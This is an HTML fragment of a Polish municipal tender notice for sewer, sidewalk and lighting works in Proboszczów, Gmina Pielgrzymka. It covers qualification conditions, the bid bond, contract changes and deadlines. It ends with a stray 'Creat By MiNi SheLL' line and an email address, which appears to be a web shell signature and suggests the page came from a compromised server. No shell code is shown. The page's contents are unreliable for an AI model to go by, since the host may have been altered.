stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w pkt 8 II Rozdziału oraz spełniają na podstawie art. 112 ustawy PZP, określone przez zamawiającego warunki udziału w postępowaniu dotyczące: <br/>a)	zdolności do występowania w obrocie gospodarczym: zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny, <br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>c)	sytuacji ekonomicznej lub finansowej: Zamawiający uzna na okoliczność znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:<br/>A.	posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż <br/>500 000,00 zł (pięćset tysięcy złotych).<br/>B.	opłaconej polisy odpowiedzialności cywilnej o wartości nie niższej niż 500 000,00 zł, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.<br/>d)	zdolności technicznej lub zawodowej: <br/>A.	Zamawiający uzna za spełnienie warunku w zakresie zdolności technicznych, jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy – w tym okresie, wykonał należycie jedną bądź dwie roboty budowlane związane z robotami ziemnymi w zakresie sieci bądź instalacji o łącznej wartości min. 750 000,00 zł. brutto.<br/>B.	Zamawiający uzna, że wykonawca spełnia warunek w zakresie kwalifikacji zawodowych, jeżeli wykonawca wykaże, że będzie dysponował w trakcie realizacji zamówienia:<br/>- pracownikiem/osobą posiadającą uprawnienia do kierowania robotami budowlanymi (kierownik budowy) – uprawnienia w specjalności sanitarnej, <br/>- pracownikiem/osobą posiadającą uprawnienia do kierowania robotami – uprawnienia w specjalności elektrycznej (kierownik robót budowlanych.<br/>- pracownikiem/osobą posiadającą uprawnienia do kierowania robotami – uprawnienia w specjalności drogowej bądź konstrukcyjno-budowlanej (kierownik robót budowlanych),<br/>wydane na podstawie przepisów, które pozwalać będą na pełnienie wskazanych funkcji w zakresie niniejszego zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca na wezwanie Zamawiającego złoży:<br/>- wykaz robót budowlanych bądź remontowo-budowlanych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty,<br/>- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, kierownik budowy, kierowanie robotami budowlanymi, wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami,<br/>- opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.<br/>- informację z banku lub spółdzielczej kasy oszczędnościowo – kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolności kredytowej wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie 15 000,00 zł (słownie: piętnaście tysięcy złotych).<br/>2)	Wadium musi obejmować pełen okres związania ofertą.<br/>3)	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4)	Wadium w pieniądzu wnieść przelewem na rachunek bankowy zamawiającego – Nr 68 8658 0009 0019 7380 2000 0050 prowadzony w Powiatowym Banku Spółdzielczym w Złotoryi z zaznaczeniem na przelewie: „wadium – kanalizacja Proboszczów”. Wadium musi wpłynąć na wskazany rachunek bankowy najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego). <br/>5)	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy: <br/>- nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib - beneficjentem wskazanym w gwarancji lub poręczeniu musi być Gmina Pielgrzymka, <br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem, <br/>- kwotę gwarancji/poręczenia, <br/>- termin ważności gwarancji/poręczenia, <br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie beneficjenta/zamawiającego w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawy<br/>Pzp (dotyczy m.in. spółek cywilnych). W przypadku wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego:<br/>- wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.<br/>- wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z<br/>pełnomocnikiem.<br/>- jeżeli oferta Wykonawców, o których mowa w niniejszym punkcie zostanie wybrana,<br/>zamawiający zastrzega możliwość żądania przed zawarciem umowy w sprawie zamówienia<br/>publicznego, przedłożenia umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy:<br/>1) przesunięcia terminu wykonania przedmiotu umowy z uwagi na niekorzystne warunki atmosferyczne uniemożliwiające<br/>wykonywanie prac (na okoliczność wystąpienia wymienionego faktu Wykonawca sporządzi notatkę służbową, która<br/>wymaga potwierdzenia przez Inspektora Nadzoru i zwróci się do Zamawiającego z pisemnym wnioskiem o przesuniecie<br/>terminu wykonania przedmiotu umowy podając przyczynę<br/>i proponowany termin zakończenia prac, który nie może być dłuższy od faktycznego okresu przerwy lub postoju),<br/>2) przypadku zaistnienia okoliczności niezależnych od Wykonawcy, w szczególności<br/>z powodu:<br/>- istnienia braków w dokumentacji o czas niezbędny na ich uzupełnienie,<br/>- konieczności wykonywania części robót w inny sposób niż założony w projekcie,<br/>- Wynagrodzenie dla robót zamiennych zostanie określone na podstawie stawek i cen jednostkowych podanych w oparciu o<br/>bieżącą wycenę tych robót,<br/>- opóźnienia dostępu do placu budowy,<br/>- w przypadku konieczności wykonania robót dodatkowych albo innych robót, które są niezbędne do dokończenia realizacji<br/>przedmiotowego zamówienia,<br/>- wstrzymania robót przez organy administracji publicznej,<br/>- działania siły wyższej (np. klęski żywiołowe, strajki lokalne lub generalne) mające bezpośredni wpływ na terminowość<br/>wykonywanych robót),<br/>- zawieszenia zakresu robót przez Zamawiającego .<br/>3) konieczności wykonania robót zamiennych roboty zamienne będą mogły wystąpić wówczas, gdy część robót opisanych w<br/>dokumentacji nie będzie wykonywana zaś strony uzgodnią w tym samym zakresie wartościowym wykonanie innych,<br/>koniecznych robót.<br/>4) zmiany sposobu realizacji zamówienia - wynikającej ze zmian w obowiązujących przepisach prawa bądź wytycznych<br/>mających wpływ na realizację przedmiotu umowy,<br/>5) konieczności wykonywania robót nieprzewidzianych i niewycenionych w ofercie,<br/>6) zmiana osób wskazanych w umowie pełniących kontrolę i nadzór nad realizowanym zamówieniem:<br/>a) zmiany kierownika budowy:<br/>Wykonawca może dokonać zmiany kierownika budowy wskazanego w ofercie, jedynie<br/>za uprzednią pisemną zgodą Zamawiającego. Wykonawca z własnej inicjatywy proponuje zmianę kierownika budowy w<br/>następujących przypadkach:<br/>- śmierci, choroby lub innych zdarzeń losowych kierownika budowy,<br/>- niewywiązywania się przez kierownika budowy z obowiązków wynikających z umowy,<br/>- konieczności zmiany z innych przyczyn niezależnych od Wykonawcy ( np. rezygnacja ,itp.)<br/>Zamawiający może żądać od Wykonawcy dokonania zmiany kierownika budowy wskazanego w ofercie, jeżeli uzna, że<br/>kierownik nie wykonuje obowiązków wynikających<br/>z umowy. Wykonawca obowiązany jest zmienić kierownika budowy zgodnie z żądaniem Zamawiającego, w terminie<br/>wskazanym przez Zamawiającego.<br/>W przypadku dokonania w/w zmian- nowy kierownik budowy musi spełniać wymagania określone w Specyfikacji Istotnych<br/>Warunków Zamówienia.<br/>b) zmiany inspektora nadzoru inwestorskiego:<br/>Zamawiający z własnej inicjatywy proponuje zmianę inspektora nadzoru w następujących przypadkach :<br/>- śmierci, choroby lub innych zdarzeń losowych inspektora nadzoru,<br/>- niewywiązywania się przez inspektora nadzoru z obowiązków wynikających z umowy,<br/>- konieczności zmiany z innych przyczyn niezależnych od Zamawiającego-np. rezygnacja, itp.<br/>Wykonawca może żądać od Zamawiającego dokonania zmiany inspektora nadzoru wskazanego w umowie, jeżeli uzna, że<br/>inspektor nadzoru nie wykonuje obowiązków wynikających z umowy.<br/>W przypadku dokonania w/w zmian - nowy inspektor nadzoru musi spełniać wymagania określone w Specyfikacji Istotnych<br/>Warunków Zamówienia.<br/>7) innych istotnych postanowień umowy - gdy ich zmiana jest konieczna w związku ze zmianą przepisów prawa<br/>powszechnie obowiązującego w zakresie mającym wpływ na realizacje przedmiotu zamówienia , w tym również zmiany<br/>stawki podatku VAT,<br/>8) wartości zamówienia – łączna wartość zmian jest mniejsza niż progi unijne oraz jest niższa niż 15% wartości pierwotnej<br/>umowy, a zmiany te nie powodują zmiany ogólnego charakteru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzp.pielgrzymka.biz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-30</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Cena oferty <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zadanie dofinansowane zostanie ze środków Rządowego Funduszu Polski Ład: Program Inwestycji Lokalnych w wysokości do 877 261,00 zł w ramach wstępnej promesy dotyczącej dofinansowania inwestycji z Programu Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych nr 01/2021/3285/PolskiLad.<br/>Dofinansowanie przeznaczone jest na część inwestycji o poniższych charakterystycznych parametrach technicznych:<br/>SIEĆ KANALIZACJI SANITARNEJ:<br/>- przykanaliki 270 m,<br/>- sieć kanalizacji sanitarnej 360 m, <br/>- rozebranie płyt betonowych 350 m2,<br/>CHODNIKI:<br/>- szerokość 2÷2,5 m,<br/>- korytowanie 430 m3,<br/>- podbudowa 430 m3,<br/>- krawężniki 560 m, <br/>- obrzeża 1165 m,<br/>- kostka + poszerzenia 2150 m2,<br/>OŚWIETLENIE:<br/>- linia kablowa długości 490 m, <br/>- 12 słupów,<br/>- 15 opraw oświetleniowych. <br/>Powyższe charakterystyczne parametry inwestycji opisują jedynie zakres objęty dofinansowaniem. Pełen przedmiot zamówienia wskazany został w ust. 4.2.2 niniejszego ogłoszenia.

Creat By MiNi SheLL
Email: jattceo@gmail.com